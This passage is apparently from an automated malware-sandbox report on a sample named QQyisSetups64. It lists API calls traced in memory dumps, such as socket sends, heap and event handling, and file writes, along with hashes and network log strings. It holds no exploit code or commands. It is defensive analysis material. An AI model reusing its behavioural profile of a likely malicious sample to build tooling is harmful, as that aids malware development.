                                                                                                                                                                                                                        • Part of subcall function 02C82B80: SwitchToThread.KERNEL32 ref: 02C82BAA
                                                                                                                                                                                                                      • send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C83FE9
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
                                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 02C84003
                                                                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 02C8401B
                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C84025
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3254528666-0
                                                                                                                                                                                                                      • Opcode ID: 399b99475bc806e38bf646b455c40def1d8ca0f7db0f3313111158968e6fc210
                                                                                                                                                                                                                      • Instruction ID: 5d56cef9d915465a5a98c612b63ea8fe30807872063ecc618459a04dfd1225aa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 399b99475bc806e38bf646b455c40def1d8ca0f7db0f3313111158968e6fc210
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8217A712407009BD334AF28D88CB5BB7F5FB84B58F508E1CE68287A80C7B6E815CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784074
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784087
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784090
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784099
                                                                                                                                                                                                                        • Part of subcall function 03781350: HeapFree.KERNEL32(?,00000000,?,?,?,037840A6,?,00000000,03784039,?,771ADFA0,03783648), ref: 03781390
                                                                                                                                                                                                                        • Part of subcall function 03781420: HeapFree.KERNEL32(?,00000000,?,?,?,037840B1,?,00000000,03784039,?,771ADFA0,03783648), ref: 0378143D
                                                                                                                                                                                                                        • Part of subcall function 03781420: _free.LIBCMT ref: 03781459
                                                                                                                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 037840B9
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?,?,00000000,03784039,?,771ADFA0,03783648), ref: 037840D4
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784150
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784157
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1219087420-0
                                                                                                                                                                                                                      • Opcode ID: 8f9ebd8744ffef78f9ded0a92c47294eaec361e1e21d0c11bb74e754ce797177
                                                                                                                                                                                                                      • Instruction ID: 226cead4b0c1a0fd962808a0bed5b93a92116fadeb3caf3faae61f8116b7f727
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f9ebd8744ffef78f9ded0a92c47294eaec361e1e21d0c11bb74e754ce797177
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B314674600A06EFD709EB39D898BA6F7A8FF48310F148649E429CB250DB79A811CFD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84074
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84087
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84090
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84099
                                                                                                                                                                                                                        • Part of subcall function 02C81350: HeapFree.KERNEL32(?,00000000,?,?,?,02C840A6,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C81390
                                                                                                                                                                                                                        • Part of subcall function 02C81420: HeapFree.KERNEL32(?,00000000,?,?,?,02C840B1,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C8143D
                                                                                                                                                                                                                        • Part of subcall function 02C81420: _free.LIBCMT ref: 02C81459
                                                                                                                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C840B9
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C840D4
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84150
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84157
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1219087420-0
                                                                                                                                                                                                                      • Opcode ID: 82102b9bb7bf84bc29e107217b73bce1ad1ab85764b88e518c9a918851675974
                                                                                                                                                                                                                      • Instruction ID: ff60bb9f4bb713d45443cb71d31f481f74d1e985a5ada7ac49723a92c45a926d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82102b9bb7bf84bc29e107217b73bce1ad1ab85764b88e518c9a918851675974
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85311470600A02EFD709EB38C898BA6F7A9FF48318F148659E42987250DB75A965DFD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$_malloc
                                                                                                                                                                                                                      • String ID: ($6$gfff$gfff
                                                                                                                                                                                                                      • API String ID: 3506388080-713438465
                                                                                                                                                                                                                      • Opcode ID: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                                                                                                                                      • Instruction ID: e58977e4b6308ef8bdb6176a41099079027becc84b9b25fdf1d384100a1df144
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BD1ACB1E00318AFDB14DFE9DD85A9EBBB9FF48300F144529E905AB381D770A905CBA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03781610: __vswprintf.LIBCMT ref: 03781646
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 03782330
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
                                                                                                                                                                                                                        • Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                                                                      • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                                                                      • API String ID: 3723585974-868042568
                                                                                                                                                                                                                      • Opcode ID: 87cbc643b55f6991c41f868c657bee97b5e8837fc9a599c8ed061846164b9d2e
                                                                                                                                                                                                                      • Instruction ID: 2cd545ce92b26b19b6ce3cf5c9b2b8932cb9718494cc3e1f46ff60d78a15c433
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87cbc643b55f6991c41f868c657bee97b5e8837fc9a599c8ed061846164b9d2e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2B1E475A402058FCF18EF68D8846AAB7B5BF88311F184AAEDD499F347DB31D941CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 02C81610: __vswprintf.LIBCMT ref: 02C81646
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 02C82330
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: __FF_MSGBANNER.LIBCMT ref: 02C86E9C
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: __NMSG_WRITE.LIBCMT ref: 02C86EA3
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86EC8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                                                                      • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                                                                      • API String ID: 3723585974-868042568
                                                                                                                                                                                                                      • Opcode ID: 810a8fe09b726a8026f5524bcf89b2fe6099777ac67758a986ce4edfff932714
                                                                                                                                                                                                                      • Instruction ID: 1606b9130bde853c1e4320b8a840e67d2acd4269c15cd7ccb2de231d7585894f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 810a8fe09b726a8026f5524bcf89b2fe6099777ac67758a986ce4edfff932714
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0B1D371A002458FCF18EF68D8886AA77A6FF84318F08C5BEDD499B346D771D941CB92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$_malloc_memcpy_s
                                                                                                                                                                                                                      • String ID: &
                                                                                                                                                                                                                      • API String ID: 3027343870-3042966939
                                                                                                                                                                                                                      • Opcode ID: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                                                                                                                                      • Instruction ID: fe61393ae449355f5b60ef0351dd8d5fc71a9c6808dfe2fe0f80bb08eea19139
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0C180B1A002199BDB28CF55CDC0BABB3F9EF48300F0485ACE609A7251D774AA85CF58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                      • Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                                                                                                                                      • Instruction ID: 05bbfe49a138cca0893cbf220b9bb6614f7f3d3b771389502736332698b29426
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D514C7EA001159FD714EF58C4C4969BBA6FF89318B2980ADD50E9B321DB32ED42CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03781878
                                                                                                                                                                                                                      • _free.LIBCMT ref: 037818B6
                                                                                                                                                                                                                      • _free.LIBCMT ref: 037818F5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03781935
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378195D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03781981
                                                                                                                                                                                                                      • _free.LIBCMT ref: 037819B9
                                                                                                                                                                                                                        • Part of subcall function 0378F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F64F
                                                                                                                                                                                                                        • Part of subcall function 0378F639: GetLastError.KERNEL32(00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000), ref: 0378F661
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      • Opcode ID: bc9a29134a23499f164261f3336eddb1ab47eaf1f4245c774c63561fb9990321
                                                                                                                                                                                                                      • Instruction ID: 423b110018310a6a58e2ef87f018b88c0004e8f32c465c4c42715abffded0718
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc9a29134a23499f164261f3336eddb1ab47eaf1f4245c774c63561fb9990321
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 315170B6A40214CFC704EF58D184965BBB6FF8926475A80ADC50AAF321D732BD43CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C81878
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C818B6
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C818F5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C81935
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C8195D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C81981
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C819B9
                                                                                                                                                                                                                        • Part of subcall function 02C86E49: HeapFree.KERNEL32(00000000,00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86E5F
                                                                                                                                                                                                                        • Part of subcall function 02C86E49: GetLastError.KERNEL32(00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000), ref: 02C86E71
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      • Opcode ID: 26734794671afdada2eed282c1d03668d977a1a28be6d788580249b1f56513f0
                                                                                                                                                                                                                      • Instruction ID: 6737a9538888692115297624fab9e0bf6a457ed467e54a1d34ffdfb50af876d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26734794671afdada2eed282c1d03668d977a1a28be6d788580249b1f56513f0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F514BB2A00210DFD714EF59D484959BBE6BF8921C72AC1ADC50EAB311C772AE43CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                      • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                                                                                                                                      • Instruction ID: 148228400219242f55cc1213743123ca50432cbd074a5494aed21c2fd29fd457
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D65141BA600211CFD718DF58C6C18A6BBB6BF8A35471980ADD6199F361C732BD42CBD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03783883
                                                                                                                                                                                                                      • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 037838C4
                                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03783931
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378395C
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 037839F4
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03783A22
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03783A39
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3058130114-0
                                                                                                                                                                                                                      • Opcode ID: 8c5eda364e84f4f5b14652f85c64ffbffab5ff82619c5603af5bc3c978c89ffd
                                                                                                                                                                                                                      • Instruction ID: be7d0ded7879bc51f615d60a015c601f5950071ae933859a62fa9109e7a83e10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c5eda364e84f4f5b14652f85c64ffbffab5ff82619c5603af5bc3c978c89ffd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1651A47C6807019BEB20FF29C984B9AB7E8FF44B18F144919D956DB680EB74F841CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C83883
                                                                                                                                                                                                                      • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02C838C4
                                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02C83931
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C8395C
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02C839F4
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02C83A22
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02C83A39
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3058130114-0
                                                                                                                                                                                                                      • Opcode ID: a6aaca9ca4ef2296c008045cbb8b8390893e6b47f38bf5cf4694fec11d5cf9b2
                                                                                                                                                                                                                      • Instruction ID: 4c0f1d82f8c5d63777c10d50330b9070391cedcc2ae31eadd8613725a038581c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6aaca9ca4ef2296c008045cbb8b8390893e6b47f38bf5cf4694fec11d5cf9b2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB51DF706007419BDB20BF65C984BAAB7E5BF84B1CF109959DD5AD7280EB34F900CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6BD
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6D7
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378E6F2
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0378E6FF
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0378E70A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0378E711
                                                                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0378E71E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4202892810-0
                                                                                                                                                                                                                      • Opcode ID: 22cc79f53e338e849a7b9dfb2f961fdfbf157fa54614e7309bd027c7b820066f
                                                                                                                                                                                                                      • Instruction ID: 57dd50daa484904a0e63159634827c4f0b197b619dd9dca9d82ada8fb95f046c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22cc79f53e338e849a7b9dfb2f961fdfbf157fa54614e7309bd027c7b820066f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3301C871381614BBE22477A4EC0EF9B367CEB89B21F108644FB15E61C5D7B8680087A5
